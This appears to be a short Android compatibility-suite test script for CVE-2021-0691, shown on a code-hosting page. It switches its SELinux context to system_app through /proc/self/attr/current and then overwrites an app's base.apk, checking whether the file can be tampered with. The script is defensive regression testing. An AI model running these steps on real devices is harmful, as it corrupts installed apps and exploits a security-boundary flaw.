unplugged-system/cts/hostsidetests/securitybulletin/res/cve_2021_0691.sh

7 lines
120 B
Bash
Raw Normal View History

#!/bin/sh
echo -n 'u:r:system_app:s0' > /proc/self/attr/current
cd $1
ls -l base.apk
echo aaa > base.apk
ls -l base.apk